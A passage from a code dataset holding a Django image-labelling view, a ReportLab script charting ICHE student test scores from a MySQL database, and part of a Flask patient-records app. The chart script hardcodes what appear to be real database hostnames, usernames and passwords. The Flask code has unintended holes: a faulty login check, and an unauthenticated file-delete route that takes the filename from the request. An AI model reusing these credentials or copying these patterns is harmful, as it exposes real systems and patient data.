os.listdir(images_path)\n img_list = []\n img_id = 0\n for file in file_list:\n if os.path.splitext(file)[-1].lower() in accepted_image_extensions:\n img_list.append({'id' : img_id, 'path' : file})\n img_id = img_id + 1\n return img_list\n\nimage_list = construct_image_list()\nprint(image_list)\n\ndef is_valid(answers):\n qid = START_ID\n while qid != question_ids['END']:\n question = questions[qid]\n answer = answers[question['question_name']]\n if answer < 0:\n return False\n selected_opt = question['options'][answer]\n assert selected_opt['val'] == answer\n qid = selected_opt['lead']\n return True\n\ndef read_answers_for_file(fid):\n img = Image.objects.filter(file_id = fid).first()\n if not img:\n return None\n answers = {\n 'binek' : img.answer_binek,\n 'pert' : img.answer_pert,\n 'ic-dis' : img.answer_icdis,\n 'framing' : img.answer_framing,\n 'uzaklik' : img.answer_uzaklik,\n 'cekim-acisi' : img.answer_cekimacisi,\n 'yabanci-cisim' : img.answer_yabancicisim,\n 'gozuken-hasar' : img.answer_gozukenhasar,\n 'birdenfazlaresim' : img.answer_birdenfazlaresim\n }\n if is_valid(answers):\n return answers\n return None\n\ndef save_answers_for_file(fid, answers):\n if not isinstance(fid, int) or fid < 0:\n return;\n\n img = Image.objects.filter(file_id = fid).first()\n if img:\n img.answer_binek = answers[0]\n img.answer_pert = answers[1]\n img.answer_icdis = answers[2]\n img.answer_framing = answers[3]\n img.answer_uzaklik = answers[4]\n img.answer_cekimacisi = answers[5]\n img.answer_yabancicisim = answers[6]\n img.answer_gozukenhasar = answers[7]\n img.answer_birdenfazlaresim = answers[8]\n else:\n img = Image(\n file_id = fid,\n answer_binek = answers[0],\n answer_pert = answers[1],\n answer_icdis = answers[2],\n answer_framing = answers[3],\n answer_uzaklik = answers[4],\n answer_cekimacisi = answers[5],\n answer_yabancicisim = answers[6],\n answer_gozukenhasar = answers[7],\n answer_birdenfazlaresim = answers[8]\n )\n print(\"db insert: \", fid, answers, img)\n img.save()\n return;\n\nvalid_int_list = list(range(-1, 20))\n\ndef index(request):\n # Instead of refreshing the page for every question, now,\n # we render everything and have the client show/hide necessary elements.\n\n image_data = ''\n file_name = '---'\n context = {}\n old_image_id = int(request.GET.get('pimg', '-1'))\n requested_image_id = int(request.GET.get('img', '-1'))\n\n if old_image_id >= 0:\n old_image_answers = [-1]*len(questions)\n for answer_id in range(len(questions)):\n answer_i = request.GET.get(str(answer_id), '-1')\n print(\"answer i : \", answer_i, type(answer_i), (not answer_i))\n if answer_i and int(answer_i) in valid_int_list:\n answer_i = int(answer_i)\n old_image_answers[answer_id] = int(answer_i)\n print(\"old_image_answers: \", old_image_answers)\n save_answers_for_file(int(old_image_id), old_image_answers)\n\n context = {'num_questions' : len(questions), 'cur_file_id' : -1, 'folder_name' : folder_name, 'image_list' : image_list, 'is_new': 1, 'answers' : {}}\n\n if requested_image_id >= 0 and requested_image_id < len(image_list):\n answers = read_answers_for_file(requested_image_id)\n is_new = 1\n if answers:\n is_new = 0\n\n image_data = load_image(\n os.path.join(images_path, image_list[requested_image_id]['path']))\n file_name = image_list[requested_image_id]['path']\n cur_image = requested_image_id\n print(answers)\n context = {**context,\n 'cur_file_id' : requested_image_id,\n 'cur_file_name' : file_name,\n 'image_data' : image_data,\n 'start' : START_ID, 'qa_pairs' : questions,\n 'is_new' : is_new, 'answers' : answers };\n\n return render(request, 'index.html', context)\n","sub_path":"polls/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"197171574","text":"# -------------------------------------------------------------------------------\r\n#\r\n# make_pdf_chart.py\r\n#\r\n# Requires Python, ReportLab, MySqlDb, and a PDF viewer such as Acrobat.\r\n#\r\n# -------------------------------------------------------------------------------\r\n\r\n# Python imports\r\nfrom types import *\r\nimport os\r\nimport sys\r\nimport imp\r\n\r\n# Third party imports\r\n# import MySQLdb\r\nimport mysql\r\n\r\nfrom reportlab.pdfgen import canvas\r\nfrom reportlab.lib import colors\r\nfrom reportlab.lib.colors import HexColor, toColor\r\nfrom reportlab.lib.pagesizes import A1\r\nfrom reportlab.lib.units import inch\r\n\r\n# these need to be defined here (globally)\r\nfrom ICHE_HANDOFF.Charts.pantone import pantoneColors\r\n\r\nlegend1_color = '#6989ff'\r\nlegend2_color = '#555555' # This is the grayscale version\r\nlegend3_color = '#999999' # This is the grayscale version\r\n\r\n\r\ndef __import__(name, globals=None, locals=None, fromlist=None):\r\n # Fast path: see if the module has already been imported.\r\n try:\r\n return sys.modules[name]\r\n except KeyError:\r\n pass\r\n\r\n # If any of the following calls raises an exception,\r\n # there's a problem we can't handle -- let the caller handle it.\r\n\r\n fp, pathname, description = imp.find_module(name)\r\n\r\n try:\r\n return imp.load_module(name, fp, pathname, description)\r\n finally:\r\n # Since we may exit via an exception, close fp explicitly.\r\n if fp:\r\n fp.close()\r\n #\r\n\r\n\r\n#\r\n\r\n# End __import__()\r\n\r\n\r\ndef GetDbScores(score_type, test_year):\r\n if not score_type in ['ICHE_2yr', 'ICHE_1yr']:\r\n print('If pulling scores from the ICHE database, you must use one of \"ICHE_2yr\", \"ICHE_1yr\".')\r\n print('These ase case-sensitive')\r\n sys.exit(1)\r\n #\r\n\r\n compositeSum = vocabularySum = readingSum = languageSum = mathematicsSum = sourcesSum = 0\r\n studentNum = 0\r\n numSummedStudents = 0\r\n\r\n # db = MySQLdb.connect( host = \"net.iche-idaho.org\", user = \"sugarloaf6160\",\r\n #\t\t\t\t\t\t\t passwd = \"goldm1ning4fun\", db = \"ichetemp\")\r\n # db = MySQLdb.connect( host = \"net.iche-idaho.org\", user = \"iche\",\r\n #\t\t\t\t\t\t\t passwd = \"s1lvercreek\", db = \"icherstest\")\r\n\r\n import mysql.connector\r\n from mysql.connector import Error\r\n\r\n connection_config_dict = {\r\n 'user': 'iche',\r\n 'password': 's1lvercreek',\r\n 'host': 'net.iche-idaho.org',\r\n 'database': 'icherstest',\r\n 'raise_on_warnings': True,\r\n 'use_pure': False,\r\n 'autocommit': True,\r\n 'pool_size': 5\r\n }\r\n try:\r\n connection = mysql.connector.connect(connection_config_dict)\r\n\r\n cursor = connection.cursor()\r\n\r\n cursor.execute(\"SELECT * from score_student_data limit 0, 6000\")\r\n student_data = cursor.fetchall()\r\n except Error as e:\r\n print(\"Error while connecting to MySQL\", e)\r\n finally:\r\n # closing database connection.\r\n if (connection.is_connected()):\r\n cursor.close()\r\n connection.close()\r\n print(\"MySQL connection is closed\")\r\n\r\n if score_type == 'ICHE_2yr':\r\n where_years = '> 1'\r\n else:\r\n where_years = '= 1'\r\n #\r\n\r\n numTotalStudents = len(student_data)\r\n\r\n for row in student_data:\r\n student = orm.score_student_data(row)\r\n\r\n query_str = \"SELECT * from testing_history where test_year = \" + str(test_year) + \\\r\n \" and testing_history_id = \" + str(student.testing_history_id) + \\\r\n \" and years_hs \" + where_years + \" limit 0, 6000\"\r\n cursor.execute(query_str)\r\n testhist_data = cursor.fetchall()\r\n\r\n if len(testhist_data) == 0:\r\n print('ERROR: Failed to get testing history for', student.f_name, student.l_name)\r\n studentNum += 1\r\n continue\r\n #\r\n\r\n from ICHE_HANDOFF import orm\r\n th = orm.testing_history(testhist_data[0])\r\n\r\n if (th.years_hs > 1 and score_type == 'ICHE_1yr') \\\r\n or (th.years_hs == 1 and score_type == 'ICHE_2yr'):\r\n print(\"Skipping student\", studentNum, \"of\", numTotalStudents, \"due to number of home-school years (\",\r\n th.years_hs, \") not as requested\")\r\n studentNum += 1\r\n continue\r\n #\r\n\r\n cursor.execute(\"SELECT * from score_npr where score_id = \" + str(student.score_id) + \" limit 0, 6000\")\r\n score_npr_data = cursor.fetchall()\r\n\r\n compositeSum += score_npr_data[0][24]\r\n vocabularySum += score_npr_data[0][1]\r\n readingSum += score_npr_data[0][3]\r\n languageSum += score_npr_data[0][10]\r\n mathematicsSum += score_npr_data[0][15]\r\n sourcesSum += score_npr_data[0][22]\r\n\r\n studentNum += 1\r\n numSummedStudents += 1\r\n print(score_type, \"; Processed student\", studentNum, \"of\", numTotalStudents)\r\n #\r\n\r\n compositeAvg = compositeSum / numSummedStudents\r\n vocabularyAvg = vocabularySum / numSummedStudents\r\n readingAvg = readingSum / numSummedStudents\r\n languageAvg = languageSum / numSummedStudents\r\n mathematicsAvg = mathematicsSum / numSummedStudents\r\n sourcesAvg = sourcesSum / numSummedStudents\r\n\r\n return [compositeAvg, vocabularyAvg, readingAvg, languageAvg, mathematicsAvg,\r\n sourcesAvg], numTotalStudents, numSummedStudents\r\n\r\n\r\n# End GetDbScores()\r\n\r\n\r\ndef SetChartFillColor(c, color):\r\n if color is tuple or color is list:\r\n bHundredMax = False\r\n for n in color:\r\n if n > 1:\r\n bHundredMax = True\r\n break\r\n #\r\n #\r\n if bHundredMax:\r\n adjColors = []\r\n for n in color:\r\n newColor = n / 100.0\r\n adjColors.append(newColor)\r\n #\r\n usedColors = adjColors\r\n else:\r\n usedColors = color\r\n #\r\n else:\r\n if color is str:\r\n lcColor = color.lower() # string.lower(arg)\r\n if lcColor[0:3] == 'pms':\r\n pmsColor = int(lcColor[3:])\r\n cmykColors = pantoneColors[pmsColor]\r\n\r\n adjColors = []\r\n for n in cmykColors:\r\n newColor = n / 100.0\r\n adjColors.append(newColor)\r\n #\r\n usedColors = adjColors\r\n\r\n elif lcColor[0] == 'p':\r\n pmsColor = int(lcColor[1:])\r\n cmykColors = pantoneColors[pmsColor]\r\n\r\n adjColors = []\r\n for n in cmykColors:\r\n newColor = n / 100.0\r\n adjColors.append(newColor)\r\n #\r\n usedColors = adjColors\r\n else:\r\n usedColors = color\r\n #\r\n else:\r\n usedColors = color\r\n #\r\n #\r\n\r\n c.setFillColor(toColor(usedColors))\r\n\r\n\r\n# End SetChartFillColor()\r\n\r\n\r\ndef Legend(c, x, y, color, desc, fontSize):\r\n '''\r\n\tDraws a colored box and descriptive text at the given location.\r\n\t'''\r\n c.setStrokeColor('black') # Outline Color\r\n\r\n SetChartFillColor(c, color)\r\n # c.setFillColor( toColor(color) )\r\n\r\n c.setLineWidth(1)\r\n height = fontSize * 0.7\r\n width = height * 1.618 # The Golden Ratio\r\n c.rect(x - fontSize / 10, y, width, height, stroke=1, fill=1) # x, y, width, height, stroke=1, fill=0\r\n\r\n c.setFont(\"Times-Roman\", fontSize)\r\n c.setFillColor('black') # Text color\r\n horizSpacer = width + height\r\n c.drawString(x + horizSpacer, y, desc)\r\n\r\n\r\n# End Legend()\r\n\r\n\r\ndef MakePdfChart(datafile, outfile):\r\n '''\r\n\tReads the user-named data file and potentially the ICHE database.\r\n\tGenerates a PDF chart and saves it in the specified file.\r\n\t'''\r\n\r\n # Make an A1-size canvas. It scales down properly when printing on smaller paper.\r\n pagesize = (max(A1), min(A1))\r\n c = canvas.Canvas(outfile, pagesize)\r\n\r\n # Make a border at 1/2 inch margins\r\n width, height = pagesize\r\n c.setLineWidth(3)\r\n c.rect(36, 36, width - 72, height - 72, stroke=1, fill=0) # x, y, width, height, stroke, fill\r\n\r\n # Import the data file\r\n data = __import__(datafile.split('.')[0])\r\n if data.chart_3D:\r\n bFlatChart = False\r\n else:\r\n bFlatChart = True\r\n #\r\n\r\n # Title\r\n c.setFont(\"Times-Roman\", 48) # 48\r\n c.drawCentredString(width / 2, height * .950, data.title)\r\n\r\n c.setFont(\"Times-Roman\", 28) # 28, 30, 32\r\n c.drawCentredString(width / 2, height * .920, data.subtitle1)\r\n c.drawCentredString(width / 2, height * .900, data.subtitle2)\r\n if len(data.subtitle4.strip()) == 0:\r\n c.setFont(\"Times-Roman\", 32) # 32, 34, 36\r\n c.drawCentredString(width / 2, height * .880, data.subtitle3)\r\n else:\r\n c.drawCentredString(width / 2, height * .880, data.subtitle3)\r\n c.setFont(\"Times-Roman\", 32) # 32, 34, 36\r\n c.drawCentredString(width / 2, height * .860, data.subtitle4)\r\n #\r\n\r\n # Comments\r\n c.setFont(\"Times-Roman\", 28) # 28, 30, 32\r\n c.drawString(300, 240, data.comment1)\r\n c.drawString(300, 215, data.comment2)\r\n\r\n # Legends\r\n Legend(c, 300, 160, legend1_color, data.legend1_text, 28) # 28, 30, 32\r\n Legend(c, 300, 130, legend2_color, data.legend2_text, 28)\r\n Legend(c, 300, 100, legend3_color, data.legend3_text, 28)\r\n\r\n # Bar chart\r\n c.setLineWidth(3)\r\n rwidth = width * 0.8\r\n rheight = height * 0.6\r\n x = width * 0.1\r\n y = height * 0.21\r\n\r\n barWidth = width * 0.025\r\n if not bFlatChart:\r\n x += barWidth / 2\r\n #\r\n\r\n c.setLineCap(1)\r\n c.setLineJoin(1)\r\n c.setStrokeColor('black')\r\n\r\n if bFlatChart:\r\n c.rect((width - rwidth) / 2, y, rwidth, rheight, stroke=1, fill=0) # x, y, width, height, stroke, fill\r\n else:\r\n c.rect(((width - rwidth) / 2) + barWidth / 2, y, rwidth, rheight, stroke=1,\r\n fill=0) # x, y, width, height, stroke, fill\r\n #\r\n\r\n if bFlatChart:\r\n pass\r\n else:\r\n c.setFillColor('lightgrey')\r\n rtSide = x + rwidth\r\n\r\n c.setLineCap(1)\r\n c.setLineJoin(1)\r\n c.setStrokeColor('black')\r\n # Bottom\r\n p = c.beginPath()\r\n p.moveTo(rtSide, y)\r\n p.lineTo(rtSide - barWidth / 3, y - barWidth / 3)\r\n p.lineTo(x - barWidth / 3, y - barWidth / 3)\r\n p.lineTo(x, y)\r\n p.lineTo(rtSide, y)\r\n c.drawPath(p, fill=1)\r\n\r\n # Left\r\n p = c.beginPath()\r\n p.moveTo(x, y)\r\n p.lineTo(x, y + rheight)\r\n p.lineTo(x - barWidth / 3, y + rheight - barWidth / 3)\r\n p.lineTo(x - barWidth / 3, y - barWidth / 3)\r\n p.lineTo(x, y)\r\n c.drawPath(p, fill=1)\r\n #\r\n\r\n chart_data = \\\r\n [\r\n (50, 50, 50, 50, 50, 50),\r\n (50, 50, 50, 50, 50, 50),\r\n (50, 50, 50, 50, 50, 50),\r\n ('Composite', 'Vocabulary', 'Reading', 'Language', 'Mathematics', 'Sources')\r\n ]\r\n colors = [legend1_color, legend2_color, legend3_color]\r\n\r\n # Potentially get data from the ICHE database\r\n if data.scores1 is str:\r\n scores_list, numTotalStudents1, numSummedStudents1 = GetDbScores(data.scores1, data.test_year)\r\n chart_data[0] = scores_list\r\n else:\r\n chart_data[0] = data.scores1\r\n #\r\n\r\n if data.scores2 is str:\r\n scores_list, numTotalStudents2, numSummedStudents2 = GetDbScores(data.scores2, data.test_year)\r\n chart_data[1] = scores_list\r\n else:\r\n chart_data[1] = data.scores2\r\n #\r\n\r\n if data.scores3 is str:\r\n scores_list, numTotalStudents3, numSummedStudents3 = GetDbScores(data.scores3, data.test_year)\r\n chart_data[2] = scores_list\r\n else:\r\n chart_data[2] = data.scores3\r\n #\r\n\r\n c.setStrokeColor('black') # Line color\r\n c.setFillColor('black') # Text color\r\n c.setLineCap(1)\r\n c.setLineJoin(1)\r\n\r\n yAxisLabelStep = 10\r\n yAxisStep = rheight / 6\r\n yAxisFloor = 40\r\n\r\n # Y Axis labels and horizontal mid-chart lines\r\n c.setLineWidth(1)\r\n if bFlatChart:\r\n yAxisLabelXoffset = 0.02\r\n yAxisLabelYoffset = 0\r\n else:\r\n yAxisLabelXoffset = 0.025\r\n yAxisLabelYoffset = barWidth / 3\r\n #\r\n for i in range(6):\r\n c.drawString(x - width * yAxisLabelXoffset,\r\n (y + (yAxisStep * i)) - (height * 0.004) - yAxisLabelYoffset,\r\n str(yAxisFloor + (yAxisLabelStep * i)))\r\n\r\n c.line(x, y + (yAxisStep * i), x + rwidth, y + (yAxisStep * i))\r\n\r\n if not bFlatChart:\r\n c.line(x - barWidth / 3, y + (yAxisStep * i) - barWidth / 3, x, y + (yAxisStep * i))\r\n #\r\n #\r\n\r\n if bFlatChart:\r\n clusterSpacing = barWidth * 1.5\r\n else:\r\n clusterSpacing = barWidth * 2\r\n #\r\n\r\n numClusters = len(chart_data[0])\r\n barsPerCluster = len(chart_data) - 1\r\n chartWidth = numClusters * ((barsPerCluster * barWidth) + clusterSpacing) - clusterSpacing\r\n if bFlatChart:\r\n barX = (width - chartWidth) / 2\r\n else:\r\n barX = ((width - chartWidth) / 2) + barWidth / 2\r\n #\r\n\r\n c.setLineWidth(1)\r\n for clusterNum in range(len(chart_data[0])):\r\n # print 'clusterNum', clusterNum\r\n\r\n for barNum in range(len(chart_data)):\r\n # print 'barNum', barNum\r\n\r\n if barNum < 3:\r\n color = colors[barNum]\r\n SetChartFillColor(c, color)\r\n\r\n value = chart_data[barNum][clusterNum]\r\n barHeight = value - yAxisFloor\r\n\r\n # Normalize the bar height to the chart height\r\n barHeight = (barHeight * rheight) / (100 - yAxisFloor)\r\n\r\n # Draw the bar\r\n if bFlatChart:\r\n # Flat Bar\r\n c.rect(barX, y, barWidth, barHeight, stroke=1, fill=1) # x, y, width, height, stroke, fill\r\n\r\n else:\r\n # 3D Bar\r\n SetChartFillColor(c, color)\r\n c.setStrokeColor('black')\r\n c.setLineWidth(1)\r\n c.setLineCap(1)\r\n c.setLineJoin(1)\r\n\r\n # Front\r\n c.rect(barX - barWidth / 3, y - barWidth / 3, barWidth, barHeight, stroke=1, fill=1)\r\n\r\n # Top\r\n p = c.beginPath()\r\n p.moveTo(barX, y + barHeight)\r\n p.lineTo(barX + barWidth, y + barHeight)\r\n p.lineTo(barX + barWidth - barWidth / 3, y + barHeight - barWidth / 3)\r\n p.lineTo(barX - barWidth / 3, y + barHeight - barWidth / 3)\r\n p.lineTo(barX, y + barHeight)\r\n c.drawPath(p, fill=1)\r\n\r\n # Right side\r\n p = c.beginPath()\r\n p.moveTo(barX + barWidth - barWidth / 3,\r\n y - barWidth / 3) # + barWidth/3 to override colored line immediately above\r\n p.lineTo(barX + barWidth - barWidth / 3, y + barHeight - barWidth / 3)\r\n p.lineTo(barX + barWidth, y + barHeight)\r\n p.lineTo(barX + barWidth, y)\r\n p.lineTo(barX + barWidth - barWidth / 3, y - barWidth / 3)\r\n c.drawPath(p, fill=1)\r\n\r\n # Adjust position for drawing value square below\r\n barX = barX - barWidth / 3\r\n barHeight = barHeight - barWidth / 3\r\n #\r\n\r\n # Draw the var value square\r\n c.setFillColor('white')\r\n c.rect(barX + (barWidth * 0.15), y + barHeight - (barWidth * .85),\r\n barWidth * 0.7, barWidth * 0.7, stroke=1, fill=1) # x, y, width, height, stroke, fill\r\n\r\n # Draw the bar value\r\n c.setFillColor('black')\r\n valueXoffset = width * 0.0058\r\n valueYoffset = height * 0.023\r\n c.drawString(barX + valueXoffset, y + barHeight - valueYoffset, str(value))\r\n\r\n if barNum == 0:\r\n nameX = barX + barWidth / 2\r\n #\r\n\r\n if bFlatChart:\r\n # Flat Bar\r\n barX += barWidth\r\n else:\r\n # 3D Bar\r\n barX += (barWidth + barWidth / 3)\r\n #\r\n else:\r\n c.setFont(\"Times-Roman\", 34) # Font family, size\r\n\r\n name = chart_data[3][clusterNum]\r\n\r\n if bFlatChart:\r\n c.drawString(nameX, y - height * 0.02, name)\r\n else:\r\n c.drawString(nameX, y - barWidth / 3 - height * 0.02, name)\r\n #\r\n #\r\n #\r\n barX += clusterSpacing\r\n #\r\n\r\n # Generate PDF and save file\r\n c.showPage()\r\n c.save()\r\n\r\n print\r\n if data.scores1 is str:\r\n print('There were', numSummedStudents1, 'of', numTotalStudents1, 'students for', data.scores1)\r\n #\r\n\r\n if data.scores2 is str:\r\n print('There were', numSummedStudents2, 'of', numTotalStudents2, 'students for', data.scores2)\r\n #\r\n\r\n if data.scores3 is str:\r\n print('There were', numSummedStudents3, 'of', numTotalStudents3, 'students for', data.scores3)\r\n #\r\n\r\n print(\"Generated PDF chart\")\r\n\r\n\r\n# End MakePdfChart()\r\n\r\n\r\nif __name__ == '__main__':\r\n # only takes one parameter (color or nothing for black and white (default))\r\n param1 = sys.argv[1]\r\n\r\n if param1 == 'color':\r\n color = True\r\n else:\r\n color = False\r\n\r\n outpath = './output/'\r\n\r\n datafile1 = 'sdc_config.py'\r\n\r\n if color == True:\r\n outfile = 'sdc_chart.pdf'\r\n else:\r\n outfile = 'sdc_chart_bw.pdf'\r\n\r\n path_outfile1 = os.path.join(outpath, outfile)\r\n\r\n datafile2 = 'trc_config.py'\r\n\r\n if color == True:\r\n outfile = 'trc_chart.pdf'\r\n else:\r\n outfile = 'trc_chart_bw.pdf'\r\n\r\n path_outfile2 = os.path.join(outpath, outfile)\r\n\r\n datafile3 = 'tra_config.py'\r\n\r\n if color == True:\r\n outfile = 'tra_chart.pdf'\r\n else:\r\n outfile = 'tra_chart_bw.pdf'\r\n\r\n path_outfile3 = os.path.join(outpath, outfile)\r\n\r\n # Set light and dark values. The third bar will be shaded 1/2 way in the middle.\r\n lightgray = 90 # Using percentage (0-100) method\r\n darkgray = 40\r\n if not color:\r\n # medgray = 65\r\n # legend1_color = (medgray, medgray, medgray)\r\n # legend2_color = (lightgray, lightgray, lightgray)\r\n # legend3_color = (darkgray, darkgray, darkgray)\r\n legend1_color = '#999999'\r\n legend2_color = '#c4c4c4' # This is the grayscale version\r\n legend3_color = \"#555555\"\r\n else:\r\n legend1_color = '#6989ff'\r\n legend2_color = '#555555' # This is the grayscale version\r\n legend3_color = '#999999' # This is the grayscale version\r\n\r\n try:\r\n os.mkdir(outpath)\r\n except:\r\n pass\r\n\r\n MakePdfChart(datafile1, path_outfile1)\r\n MakePdfChart(datafile2, path_outfile2)\r\n MakePdfChart(datafile3, path_outfile3)\r\n\r\n # Display the newly-generated charts!\r\n# os.chdir(outpath)\r\n# os.system(outfile)\r\n\r\n# End main\r\n\r\n\r\n# EOF\r\n","sub_path":"Charts/make_pdf_chart.py","file_name":"make_pdf_chart.py","file_ext":"py","file_size_in_byte":19163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"380265825","text":"# USING LIBRARY #\nimport os\nimport sqlite3\nfrom flask import Flask, request ,send_from_directory, session, g, redirect, url_for, render_template\\\n ,request, flash, abort\nfrom contextlib import closing\nfrom werkzeug import secure_filename , SharedDataMiddleware\n\n# INIT APP #\napp = Flask(__name__)\napp.config.from_object(__name__)\napp.config.from_pyfile('CONFIG', silent = True)\napp.add_url_rule('/static/', 'uploaded_file',build_only=True)\napp.wsgi_app = SharedDataMiddleware(app.wsgi_app, {'/static': app.config['UPLOAD_FOLDER']})\n\n# EXT \nALLOWED_EXTENSIONS = set(['txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'])\n\n# DATABASE #\ndef connect_db(): \n return sqlite3.connect(app.config['DATABASE'])\n# INIT DB #\n\ndef init_db():\n with closing (connect_db()) as db:\n with app.open_resource('schema.sql',mode='r') as f:\n db.cursor().executescript(f.read())\n db.commit()\n flash('Init DB completed.')\n\n# QUERY DB #\ndef query_db(query, args=(), one=False):\n cur = connect_db().execute(query, args)\n rv = cur.fetchall()\n cur.close()\n return (rv[0] if rv else None) if one else rv\n\n# REQUEST # \n@app.before_request\ndef before_request():\n g.db = connect_db()\n\n@app.teardown_request\ndef teardown_request(exception):\n db = getattr(g, 'db', None)\n if db is not None:\n db.close()\n\n# SHOW PATIENT #\n@app.route('/')\ndef show_patients():\n cur = g.db.execute('select id, name, phone, address, sex, firstVisit from patients order by id asc')\n patients = [ dict( Id=row[0] ,name=row[1], phone=row[2], address=row[3], sex=row[4], firstVisit=row[5] ) \\\n for row in cur.fetchall() ]\n \n session.mode = 'SHOW'\n return render_template ('show_patients.html', patients = patients )\n\n# LOGIN #\n@app.route('/login', methods = ['GET', 'POST'])\ndef login():\n error = None\n if request.method == 'POST':\n if request.form['username'] != app.config['USERNAME']:\n error = 'Invalid username'\n if request.form['password'] != app.config['PASSWORD']:\n error = 'Invalid password'\n else:\n session['logged_in'] = True\n flash ('You were logged in.')\n return redirect (url_for ('show_patients'))\n return render_template ('login.html', error = error )\n\n# LOGOUT #\n@app.route ('/logout') \ndef logout():\n session.pop('logged_in', None)\n flash ('You were logged out.')\n return redirect (url_for ('show_patients'))\n\n# ADD PATIENT #\n@app.route('/add_patient')\ndef add_patient():\n if not session.get('logged_in'): abort(401)\n #flash ('Add new patient')\n return render_template ('add_patient.html')\n\n# ADD PATIENT EVENT #\n@app.route('/add_patient_event', methods = ['POST'])\ndef add_patient_event():\n if not session.get('logged_in'): abort(401)\n g.db.execute ('insert into patients (name, sex, birthday, phone, address, reason, firstVisit) values ( ? , ? , ? , ? , ? , ? , ? )',\n [request.form['name'], \\\n request.form['sex'],\\\n request.form['birthday'],\\\n request.form['phone'],\\\n request.form['address'],\\\n request.form['reason'],\\\n request.form['firstVisit']])\n g.db.commit()\n flash('New Patient was successfully recorded.')\n return redirect (url_for ('show_patients'))\n\n# Edit Patient PAGE #\n@app.route('/edit_patient')\ndef edit_patient():\n if not session.get('logged_in'): abort(401)\n Id = request.args.get('Id')\n cur = query_db ('select id, name, sex, birthday, phone, address, reason, firstVisit from patients where id = ?', [ Id ], True)\n if cur is None:\n flash ('Cur is None.')\n return redirect (url_for ('show_patients'))\n else:\n session.mode = 'EDIT'\n patients = dict ( Id = cur[0],\\\n name = cur[1],\\\n sex = cur[2],\\\n birthday= cur[3],\\\n phone= cur[4],\\\n address= cur[5],\\\n reason= cur[6],\\\n firstVisit= cur[7] ) \n #flash ('Test Data: Obj-Id: ' + str(cur[2]))\n return render_template ('edit_patient.html', patient=patients)\n\n# Edit Patient Event #\n@app.route('/edit_patient_event', methods = ['POST'])\ndef edit_patient_event(Id=None):\n if not session.get('logged_in'): abort(401)\n Id = request.args.get('Id')\n g.db.execute ('update patients set name = ? , sex = ? , birthday = ? , phone = ? ,\\\n address = ? , reason = ? , firstVisit = ? where id = ? ',\n [request.form['name'], \\\n request.form['sex'],\\\n request.form['birthday'],\\\n request.form['phone'],\\\n request.form['address'],\\\n request.form['reason'],\\\n request.form['firstVisit'],\\\n Id])\n g.db.commit()\n session.mode = 'SHOW'\n flash('Saved Successfully.')\n return redirect (url_for ('show_patients'))\n\n# DELETE PATIENT EVENT #\n@app.route('/delete_patient_event')\ndef delete_patient_event(Id=None):\n if not session.get('logged_in'): abort(401)\n Id = request.args.get('Id')\n g.db.execute ('delete from patients where id = ?', [ Id ])\n g.db.commit() \n return redirect (url_for ('show_patients'))\n\n# XRAY & PICTURE PAGE #\n@app.route('/picture_library', methods = ['GET' , 'POST'])\ndef picture_library():\n if not session.get('logged_in'): abort(401)\n Id = request.args.get('Id')\n isXray = request.args.get('isXray')\n cur = g.db.execute ('select * from images where patientID = ? and isXRay = ? order by id desc', [ Id, isXray ])\n if cur is None:\n flash ('Empty Library.') \n else:\n images = [ dict( Id = row[0] , patientID=row[1], filename=row[2], isXray=row[3] ) \\\n for row in cur.fetchall() ]\n \n #flash ('patientID: ' + str(Id) + 'isXray:' + str(isXray) + ' images:' + str(len(images))) \n session.mode = 'PICTURE'\n return render_template ('picture_library.html', images=images, Id=Id, isXray=isXray)\n\n@app.route('/normal_picture', methods = ['GET' , 'POST'])\ndef normal_picture(Id=None, isXray=False):\n Id = request.args.get('Id')\n redirect (url_for('picture_library', Id=Id, isXray=0))\n\n@app.route('/xray_picture', methods = ['GET' , 'POST'])\ndef xray_picture(Id=None, isXray=True):\n Id = request.args.get('Id')\n redirect (url_for('picture_library', Id=Id, isXray=1))\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1] in ALLOWED_EXTENSIONS\n \n@app.route('/upload_images_to_folder', methods=['POST'])\ndef upload_images_to_folder(Id=None):\n if not session.get('logged_in'): abort(401)\n # File ?\n if request.method == 'POST':\n isXray = request.args.get('isXray')\n patientID = request.args.get('Id')\n file = request.files['filesUpload']\n #for file in files:\n cur = g.db.execute ('insert into images ( filename ,isXray, patientID ) values ( ? , ? , ? )',\n [ file.filename,\n isXray,\n patientID ])\n g.db.commit()\n #flash ('Commited data > database. Uploading files..')\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n file.save(os.path.join(os.getcwd() + app.config['UPLOAD_FOLDER'], filename))\n flash ('Uploaded successfully.' +isXray)\n return redirect(url_for('picture_library',Id=patientID, isXray=isXray ))\n\ndef uploaded_file(filename):\n return url_for(app.config['UPLOAD_FOLDER'], filename=filename )\n\n@app.route('/remove_image')\ndef remove_image():\n Id = request.args.get('Id')\n filename = request.args.get('filename')\n isXray = request.args.get('isXray')\n patientID = request.args.get('patientID')\n # Remove from file.\n path = os.path.join(os.getcwd() + app.config['UPLOAD_FOLDER'], filename)\n if(os.path.isfile(path)):\n os.remove(path)\n # Remove from DB.\n g.db.execute ('delete from images where id = ?' , [ Id ])\n g.db.commit()\n flash('Removed Picture !')\n\n return redirect(url_for('picture_library',Id=patientID, isXray=isXray ))\n\n\n# SCHEDULE PAGE #\n@app.route('/show_schedule')\ndef show_schedule(Id=None):\n Id = request.args.get('Id')\n cur = g.db.execute ('select visitDate, price, note, doctor ,patientID, Id \\\n from schedules where patientID = ? order by visitDate desc', [Id])\n \n schedules = [ dict( visitDate=row[0] , price=row[1], note=row[2],\\\n doctor=row[3] ,patientID=row[4], Id =row[5] ) \\\n for row in cur.fetchall() ]\n session.mode = 'SCHEDULE' \n return render_template ('show_schedule.html', schedules=schedules , Id=Id )\n\n# ADD SCHEDULE PAGE #\n@app.route('/add_schedule')\ndef add_schedule():\n if not session.get('logged_in'): abort(401)\n Id = request.args.get('Id')\n session.mode = 'SCHEDULE'\n return render_template('add_schedule.html', Id=Id)\n\n@app.route('/add_schedule_event', methods=[ 'POST' ])\ndef add_schedule_event():\n if not session.get('logged_in'): abort(401)\n Id = request.args.get('Id')\n g.db.execute ('insert into schedules (visitDate, price, note, doctor ,patientID) values ( ? , ? , ? , ? , ?)',\n [request.form['visitDate'], \\\n 